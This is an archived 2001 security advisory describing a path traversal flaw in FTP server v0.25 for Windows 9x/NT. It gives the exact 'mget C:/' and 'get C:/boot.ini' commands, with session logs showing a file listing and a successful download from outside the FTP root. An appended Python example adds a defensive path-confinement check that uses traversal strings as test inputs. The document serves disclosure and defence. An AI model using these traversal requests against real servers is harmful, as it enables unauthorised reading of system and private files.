ftp.server.025.txt
Posted Apr 27, 2001
Authored by Andris K

FTP server v0.25 for Windows 9x/NT has a bug which allows remote users to download and view any file on the system.

tags | exploit, remote
systems | windows
SHA-256 | 910a99610a7baee20dce791605ca8060728ec4d8313637c82ca433e38c3120c8

Andrisk Security Advisory  1# - FTP server v0.25

Topic: FTP Server v0.25
Announced: 2001-04-25
Affects: FTP server version 0.25
OS : Win9x/NT

I. Problem Description
**********************
FTP Server 0.25 is an FTP server for Windows 9x/NT. A bug allows any
user to download and view any file on the remote computer.

II. Impact
**************
Sending the command "mget C:/" makes it possible to view the files in C:\
Sending the command "get C:/file [filename]" makes it possible to download the specified file

Example 1:
--------
ftp> mget
(remote-files) C:/
mget !!?
200 Port command successful.
150 Opening data connection for !!.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\!!
mget AUTOEXEC.BAT?
200 Port command successful.
150 Opening data connection for AUTOEXEC.BAT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\AUTOEXEC.BAT
mget boot.ini?
200 Port command successful.
150 Opening data connection for boot.ini.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\boot.ini
mget CONFIG.SYS?
200 Port command successful.
150 Opening data connection for CONFIG.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\CONFIG.SYS
mget ffastun.ffa?
200 Port command successful.
150 Opening data connection for ffastun.ffa.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffa
mget ffastun.ffl?
200 Port command successful.
150 Opening data connection for ffastun.ffl.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffl
mget ffastun.ffo?
200 Port command successful.
150 Opening data connection for ffastun.ffo.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffo
mget ffastun0.ffx?
200 Port command successful.
150 Opening data connection for ffastun0.ffx.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun0.ffx
mget FTP Server?
200 Port command successful.
150 Opening data connection for FTP Server.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\FTP Server
mget IO.SYS?
200 Port command successful.
150 Opening data connection for IO.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\IO.SYS
mget mirc?
200 Port command successful.
150 Opening data connection for mirc.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\mirc
mget MSDOS.SYS?
200 Port command successful.
150 Opening data connection for MSDOS.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\MSDOS.SYS
mget NTDETECT.COM?
200 Port command successful.
150 Opening data connection for NTDETECT.COM.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\NTDETECT.COM
mget ntldr?
200 Port command successful.
150 Opening data connection for ntldr.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ntldr
mget os240905.bin?
200 Port command successful.
150 Opening data connection for os240905.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os240905.bin
mget os560179.bin?
200 Port command successful.
150 Opening data connection for os560179.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os560179.bin
mget pagefile.sys?
200 Port command successful.
150 Opening data connection for pagefile.sys.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\pagefile.sys
mget Program Files?
200 Port command successful.
150 Opening data connection for Program Files.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\Program Files
mget rc5?
200 Port command successful.
150 Opening data connection for rc5.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\rc5
mget RECYCLER?
200 Port command successful.
150 Opening data connection for RECYCLER.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\RECYCLER
mget TEMP?
200 Port command successful.
150 Opening data connection for TEMP.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\TEMP
mget WINNT?
200 Port command successful.
150 Opening data connection for WINNT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\WINNT

**************************************************************************************************
Example 2:

ftp> get
(remote-file) C:/boot.ini
(local-file) boot.ini
local: boot.ini remote: C:/boot.ini
200 Port command successful.
150 Opening data connection for C:/boot.ini.
100% |*********************************************************************************| 289 00:00 ETA
226 File sent ok
289 bytes received in 0.00 seconds (84.00 KB/s)
ftp>

III. Solution
*************
At this time, no patch is available.
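
The server-side check whose absence the two examples point to, as an added example that is not part of the original advisory or of the FTP server's code. It assumes the server joins the client-supplied path to its root without validation (naive_resolve); confined_resolve, is_confined and the cwd parameter are hypothetical names, and FTP_ROOT is the directory shown in the 501 replies above.

```python
import ntpath  # Windows path rules, usable on any OS

FTP_ROOT = r"C:\FTP Server\ftproot"  # root shown in the advisory's 501 replies


def naive_resolve(root, arg):
    # Assumption: the server joins the client path to its root unchecked.
    # ntpath.join drops `root` when `arg` has its own drive or is absolute.
    return ntpath.normpath(ntpath.join(root, arg))


def confined_resolve(root, cwd, arg):
    """Map a client path to a real path under `root` or raise PermissionError.
    `cwd` is the session's virtual directory; "/" means the FTP root."""
    arg = arg.replace("\\", "/")
    drive, _ = ntpath.splitdrive(arg)
    if drive or ":" in arg or "\x00" in arg:
        # Drive letters, UNC shares, NTFS stream syntax and NULs are refused.
        raise PermissionError("illegal path: %r" % arg)
    # A leading "/" restarts at the virtual root, anything else extends cwd.
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    real = ntpath.normpath(ntpath.join(root, virtual.lstrip("/")))
    # Compare after normalisation; Windows paths are case-insensitive.
    root_n = ntpath.normcase(ntpath.normpath(root))
    real_n = ntpath.normcase(real)
    if real_n != root_n and not real_n.startswith(root_n + "\\"):
        raise PermissionError("path escapes FTP root: %r" % arg)
    return real


def is_confined(arg, cwd="/", root=FTP_ROOT):
    try:
        confined_resolve(root, cwd, arg)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    for arg in ("C:/", "C:/boot.ini", "../../boot.ini", "boot.ini"):
        print("%-16r naive=%-36r confined=%s"
              % (arg, naive_resolve(FTP_ROOT, arg), is_confined(arg)))
```

The check is purely lexical; a server should also resolve junctions and links before opening the file and run under an account that cannot read outside the FTP root.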

IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>

Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p
